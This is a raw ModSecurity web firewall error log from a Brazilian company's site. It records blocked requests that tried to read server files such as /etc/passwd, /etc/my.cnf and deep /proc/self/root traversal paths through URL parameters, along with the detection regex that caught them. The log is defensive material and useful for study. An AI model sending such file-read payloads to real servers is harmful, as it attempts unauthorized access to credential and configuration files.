"ab1YgvXLqtnMIWvjpaLHUAAAAo8"]
[Fri Mar 20 11:24:04.673038 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:48058] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YhOoXxyEfFpUF8f-sPAAAAVE"]
[Fri Mar 20 11:24:06.387759 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:48178] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YhgF0L0L-SsrnPo6VHwAAAs0"]
[Fri Mar 20 11:24:06.691941 2026] [:error] [pid 10189:tid 140411599251200] [client 216.73.216.191:48190] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YhjJ3M9BSuKP7CAZSHQAAAJE"]
[Fri Mar 20 11:24:06.987947 2026] [:error] [pid 11642:tid 140411725141760] [client 216.73.216.191:48212] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yhrninkcc-iUj5AqJLAAAA4I"]
[Fri Mar 20 11:24:07.207556 2026] [:error] [pid 10189:tid 140411649607424] [client 216.73.216.191:48222] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YhzJ3M9BSuKP7CAZSIAAAAIs"]
[Fri Mar 20 11:24:07.669057 2026] [:error] [pid 7235:tid 140411691570944] [client 216.73.216.191:48262] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yh_qxLDW4GITHUkQWWgAAAQY"]
[Fri Mar 20 11:24:09.236825 2026] [:error] [pid 11642:tid 140411708356352] [client 216.73.216.191:48390] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yibninkcc-iUj5AqJMQAAA4Q"]
[Fri Mar 20 11:24:09.535691 2026] [:error] [pid 10189:tid 140411666392832] [client 216.73.216.191:48418] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YiTJ3M9BSuKP7CAZSJwAAAIk"]
[Fri Mar 20 11:24:11.321953 2026] [:error] [pid 11167:tid 140411574073088] [client 57.141.18.80:48508] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Yi_HIg5MgXLBnicMh6wAAAdQ"]
[Fri Mar 20 11:24:22.542895 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.228.61:54298] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1YlvHIg5MgXLBnicMh9gAAAcY"]
[Fri Mar 20 11:24:24.031454 2026] [:error] [pid 7893:tid 140411599251200] [client 57.141.18.36:48908] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1YmBCii7xarUs8iHaWcgAAAhE"]
[Fri Mar 20 11:24:26.344901 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:40962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YmuoXxyEfFpUF8f-sXwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:24:38.380207 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.8:49276] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1YpDJ3M9BSuKP7CAZSVgAAAJA"]
[Fri Mar 20 11:25:09.415924 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.81:50174] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Yxda6ubjKNq_cu4YGjAAAA0w"]
[Fri Mar 20 11:25:11.163545 2026] [:error] [pid 11642:tid 140411616036608] [client 216.73.216.191:50306] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yx7ninkcc-iUj5AqJRQAAA48"]
[Fri Mar 20 11:25:12.864131 2026] [:error] [pid 10189:tid 140411658000128] [client 216.73.216.191:50422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YyDJ3M9BSuKP7CAZSgAAAAIo"]
[Fri Mar 20 11:25:13.045261 2026] [:error] [pid 10189:tid 140411632822016] [client 216.73.216.191:50430] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YyTJ3M9BSuKP7CAZSgQAAAI0"]
[Fri Mar 20 11:25:13.967393 2026] [:error] [pid 26799:tid 140411674785536] [client 216.73.216.191:50504] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yyda6ubjKNq_cu4YGmQAAA0g"]
[Fri Mar 20 11:25:14.478171 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:50536] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YyuoXxyEfFpUF8f-scgAAAUw"]
[Fri Mar 20 11:25:14.671592 2026] [:error] [pid 10189:tid 140411649607424] [client 216.73.216.191:50550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YyjJ3M9BSuKP7CAZShQAAAIs"]
[Fri Mar 20 11:25:15.071289 2026] [:error] [pid 10189:tid 140411574073088] [client 216.73.216.191:50570] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YyzJ3M9BSuKP7CAZShwAAAJQ"]
[Fri Mar 20 11:25:16.311132 2026] [:error] [pid 11167:tid 140411590858496] [client 216.73.216.191:50676] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YzPHIg5MgXLBnicMiJwAAAdI"]
[Fri Mar 20 11:25:18.167729 2026] [:error] [pid 7235:tid 140411733534464] [client 216.73.216.191:50730] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YzfqxLDW4GITHUkQWgwAAAQE"]
[Fri Mar 20 11:25:21.677273 2026] [:error] [pid 9818:tid 140411716749056] [client 216.73.216.191:50970] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y0V1pVZ5mVmJwsFNbOwAAAEM"]
[Fri Mar 20 11:25:22.243144 2026] [:error] [pid 31215:tid 140411666392832] [client 216.73.216.191:51012] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y0gF0L0L-SsrnPo6VVQAAAsk"]
[Fri Mar 20 11:25:22.300929 2026] [:error] [pid 10189:tid 140411540502272] [client 216.73.216.191:51018] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y0jJ3M9BSuKP7CAZSkgAAAJg"]
[Fri Mar 20 11:25:23.015632 2026] [:error] [pid 7893:tid 140411683178240] [client 216.73.216.191:51074] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y0xCii7xarUs8iHaWtQAAAgc"]
[Fri Mar 20 11:25:24.195840 2026] [:error] [pid 11167:tid 140411683178240] [client 216.73.216.191:51156] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y1PHIg5MgXLBnicMiMAAAAcc"]
[Fri Mar 20 11:25:24.368792 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:51172] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Y1Na6ubjKNq_cu4YGswAAA0o"]
